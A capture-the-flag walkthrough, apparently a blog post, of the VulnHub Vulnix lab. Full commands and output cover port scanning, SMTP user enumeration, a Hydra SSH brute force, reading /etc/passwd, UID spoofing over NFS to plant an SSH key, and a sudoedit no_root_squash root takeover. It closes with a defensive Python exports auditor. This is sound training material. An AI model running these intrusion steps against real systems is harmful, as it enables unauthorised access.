Walkthrough-HackLAB Vulnix

Published: 2023-04-21 14:02:31  Author: Jarwu

0x01 Environment

Target machine:
https://www.vulnhub.com/entry/hacklab-vulnix,48/

0x02 Process

1. Information gathering

┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# netdiscover -r 192.168.60.1/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                   
                                                                                                                 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.60.188  00:0c:29:48:7b:e4      1      60  VMware, Inc.                                                  

Found the IP: 192.168.60.188

Port information

┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# nmap --min-rate 10000 -p- 192.168.60.188
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 04:37 EDT
Nmap scan report for vulnix (192.168.60.188)
Host is up (0.0020s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
79/tcp    open  finger
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
33049/tcp open  unknown
35637/tcp open  unknown
40287/tcp open  unknown
40657/tcp open  unknown
43592/tcp open  unknown
MAC Address: 00:0C:29:48:7B:E4 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.15 seconds

2. Approach

NFS is open.
List the exported shares:

┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# showmount -e 192.168.60.188
Export list for 192.168.60.188:
/home/vulnix *
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# mkdir /tmp/mount                                     
                                                                                                                  
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# mount -t nfs  192.168.60.188:/home/vulnix /tmp/mount/
                                                                                                                  
┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# cd /tmp/mount 
cd: permission denied: /tmp/mount

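The exported directory has permissions set. Because of how NFS works, the directory can only be accessed by a user with the same UID or GID.

Port 25 is open.
Enumerate SMTP users: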

┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.60.188
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt
Target count ............. 1
Username count ........... 17
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Apr 11 05:25:17 2023 #########
192.168.60.188: root exists
192.168.60.188: user exists
######## Scan completed at Tue Apr 11 05:25:18 2023 #########
2 results.

17 queries in 1 seconds (17.0 queries / sec)

Brute-force the password of the account named user

┌──(root㉿kali)-[/home/kali/Desktop/tmp]
└─# hydra -l user -P /usr/share/wordlists/rockyou.txt -t 4 -f 192.168.60.188 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-11 05:29:38
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.60.188:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 33.00 tries/min, 99 tries in 00:03h, 14344300 to do in 7244:36h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 29.60 tries/min, 444 tries in 00:15h, 14343955 to do in 8076:34h, 4 active
[22][ssh] host: 192.168.60.188   login: user   password: letmein
[STATUS] attack finished for 192.168.60.188 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-11 05:47:16

Obtained the credentials:
user:letmein

SSH login

┌──(kali㉿kali)-[~]
└─$ ssh user@192.168.60.188       
The authenticity of host '192.168.60.188 (192.168.60.188)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.188' (ECDSA) to the list of known hosts.
user@192.168.60.188's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Apr 11 11:02:41 BST 2023

  System load:  0.0              Processes:           90
  Usage of /:   90.6% of 773MB   Users logged in:     0
  Memory usage: 8%               IP address for eth0: 192.168.60.188
  Swap usage:   0%

  => / is using 90.6% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

user@vulnix:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
postfix:x:104:110::/var/spool/postfix:/bin/false
dovecot:x:105:112:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:106:65534:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:107:113::/var/lib/landscape:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
vulnix:x:2008:2008::/home/vulnix:/bin/bash
statd:x:109:65534::/var/lib/nfs:/bin/false
user@vulnix:~$ 

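The vulnix user has UID 2008, so create a vulnix user with UID 2008 on Kali.

Because the target's vulnix user has its own home directory exported over NFS, uploading a public key is all that is needed to log in with the matching private key.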

┌──(root㉿kali)-[/home/kali]
└─# useradd -u 2008 vulnix
┌──(root㉿kali)-[/home/kali]
└─# su vulnix                                               
$ bash
vulnix@kali:/home/kali$ cd /tmp/mount/
vulnix@kali:/tmp/mount$ ls -al
total 20
drwxr-x---  2 vulnix vulnix 4096 Sep  2  2012 .
drwxrwxrwt 17 root   root   4096 Apr 20 22:29 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile
vulnix@kali:/tmp/mount$ mkdir .ssh
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x---  3 vulnix vulnix 4096 Apr 20  2023 .
drwxrwxrwt 17 root   root   4096 Apr 20 22:29 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile
drwxr-xr-x  2 vulnix vulnix 4096 Apr 20  2023 .ssh
vulnix@kali:/tmp/mount$ exit
exit
$ exit

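The steps above switch to the vulnix user, enter the mounted directory, and create the .ssh folder.

Next, generate a key pair and place the public key in the .ssh folder of the mounted directory.

ssh-keygen

Just press Enter to accept the defaults.

Next, import the key: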

┌──(root㉿kali)-[~]
└─# cat .ssh/id_rsa.pub
ssh-rsa [public key omitted] root@kali
                                                                                    
┌──(root㉿kali)-[~]
└─# su vulnix          
$ bash
vulnix@kali:/root$ cd /tmp/mount
vulnix@kali:/tmp/mount$ ls
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x---  3 vulnix vulnix 4096 Apr 20 22:30 .
drwxrwxrwt 17 root   root   4096 Apr 20 22:29 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile
drwxr-xr-x  2 vulnix vulnix 4096 Apr 20 22:30 .ssh
vulnix@kali:/tmp/mount$ cd .ssh
vulnix@kali:/tmp/mount/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali' > authorized_keys
vulnix@kali:/tmp/mount/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIUQcZpz9WTBZuQZWSFpjsfPpu3eih6OZFWYa6ubn6/+5I7zn5flIMqkjhclfNqxg4Pw/+caiwDJPPgA0lKGioszghE5r19LFtq+q+ttG+QO5ELqD212QHzDz6EtH+kBGx7SX++vR505HB7p2JwTKi53Ti903B6I+51FRhrQA+qe1IoDoWbOrroXu+odryibqLnuzX/OGYgHhS4AbLtYKkfOO0p7dFQnd4xZFQLmqwPW+QG493/780pOMvb0E0Me5stwINfsAKPQhX2H2OKQBAeVLg/ipQjbeKFY9mdkHyutyDenmESd35frzVO8/agkd6ndo9DFJyWv4P0xnAOGOV1JzXws0FeTZpTT7SDZwdXSc2bNwti3EoM0UEEYcLC4w+QbvZkkYbEAEGLC0ZDEVnf6Ji4u8iHB2fisgu4XtncTkMJ+wOnfYUiYY1zosPN2ZnZRYC61U+TQufTBx+n8+y2U0yUEo6bwe86B6LrTrRSHyNB31bxZ82rXRK0XHvxQc= root@kali
vulnix@kali:/tmp/mount/.ssh$ ls
authorized_keys
vulnix@kali:/tmp/mount/.ssh$ ls -al
total 12
drwxr-xr-x 2 vulnix vulnix 4096 Apr 20 22:33 .
drwxr-x--- 3 vulnix vulnix 4096 Apr 20 22:30 ..
-rw-r--r-- 1 vulnix vulnix  563 Apr 20 22:33 authorized_keys
vulnix@kali:/tmp/mount/.ssh$ chmod 600 authorized_keys 
vulnix@kali:/tmp/mount/.ssh$ cd ..
vulnix@kali:/tmp/mount$ chmod 700 .ssh/
vulnix@kali:/tmp/mount$ ls -al
total 24
drwxr-x---  3 vulnix vulnix 4096 Apr 20 22:30 .
drwxrwxrwt 17 root   root   4096 Apr 20 22:39 ..
-rw-r--r--  1 vulnix vulnix  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 vulnix vulnix 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 vulnix vulnix  675 Apr  3  2012 .profile
drwx------  2 vulnix vulnix 4096 Apr 20 22:33 .ssh

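Log in with the key. The SSH version on the target is too old and the SSH version on the 2023 Kali release is too new, so an extra option has to be added before the private-key login succeeds.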

┌──(root㉿kali)-[~]
└─# ssh vulnix@192.168.60.188 -oPubkeyAcceptedKeyTypes=ssh-rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Apr 21 04:23:32 BST 2023

  System load:  0.0              Processes:           89
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 7%               IP address for eth0: 192.168.60.188
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Apr 21 03:49:28 2023 from kali
vulnix@vulnix:~$ 

Privilege escalation
The vulnix user is allowed to edit the /etc/exports file:

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ sudoedit /etc/exports

So add an export for the /root directory:

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree$
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root *(no_root_squash,insecure,rw)

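Reboot the target machine.

Mount the export the same way as above, write the public key, and then connect with the private key.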

┌──(root㉿kali)-[~]
└─# showmount -e 192.168.60.188                               
Export list for 192.168.60.188:
/root        *
/home/vulnix *
                                                                                    
┌──(root㉿kali)-[~]
└─# mkdir /tmp/root                             
                                                                                    
┌──(root㉿kali)-[~]
└─# mount -t nfs  192.168.60.188:/root /tmp/root
                                                                                    
┌──(root㉿kali)-[~]
└─# cd /tmp/root 
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# ls -al     
total 28
drwx------  3 root root 4096 Sep  2  2012 .
drwxrwxrwt 18 root root 4096 Apr 21 01:49 ..
-rw-------  1 root root    0 Sep  2  2012 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep  2  2012 .cache
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-r--------  1 root root   33 Sep  2  2012 trophy.txt
-rw-------  1 root root  710 Sep  2  2012 .viminfo
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# mkdir .ssh                                  
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# cp ~/.ssh/id_rsa.pub /tmp/root/.ssh/authorized_keys
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# cat .ssh/authorized_keys                           
ssh-rsa [public key omitted] root@kali
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# ls -al .ssh             
total 12
drwxr-xr-x 2 root root 4096 Apr 21 01:50 .
drwx------ 4 root root 4096 Apr 21 01:50 ..
-rw-r--r-- 1 root root  563 Apr 21 01:50 authorized_keys
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# chmod 600 .ssh/authorized_keys 
                                                                                    
┌──(root㉿kali)-[/tmp/root]
└─# ssh root@192.168.60.188 -oPubkeyAcceptedKeyTypes=ssh-rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Apr 21 06:51:13 BST 2023

  System load:  0.0              Processes:           93
  Usage of /:   84.5% of 773MB   Users logged in:     0
  Memory usage: 8%               IP address for eth0: 192.168.60.188
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnix:~# 

Root privileges obtained.
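
Both NFS steps above (the UID-matched access to /home/vulnix and the no_root_squash export of /root) come down to what /etc/exports allows. The following is an added example, not part of the original post: a small auditor that flags those settings. The function name, the finding labels, the SENSITIVE path list and the /srv/data entry are assumptions made for illustration.

```python
import re

# Constructed sample: the two export lines from the walkthrough plus one
# restrictive entry (the /srv/data line is invented for contrast).
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix    *(rw,root_squash)
/root *(no_root_squash,insecure,rw)
/srv/data 192.168.60.10(ro,sync,root_squash)
"""

# Assumption: directories where write access lets a client change who can log in.
SENSITIVE = ("/root", "/home", "/etc")
SPEC_RE = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")  # client(opt,opt,...)

def audit_exports(text):
    """Return sorted (path, client, finding) tuples for risky export entries."""
    findings = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = SPEC_RE.match(spec)
            if m is None:
                continue
            client = m.group(1) or "*"           # "(rw)" alone applies to any host
            opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
            sensitive = any(path == p or path.startswith(p + "/") for p in SENSITIVE)
            if client == "*":
                findings.add((path, client, "any-host"))
            if "no_root_squash" in opts:         # client UID 0 stays UID 0
                findings.add((path, client, "no_root_squash"))
            if "insecure" in opts:               # source ports above 1023 accepted
                findings.add((path, client, "insecure-ports"))
            if "rw" in opts and sensitive:
                findings.add((path, client, "writable-sensitive-path"))
    return sorted(findings)

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:15} {client:15} {finding}")
```

/home/vulnix is still flagged even though it carries root_squash, because root_squash remaps only UID 0; restricting the client list or using all_squash closes the UID-matching path shown earlier.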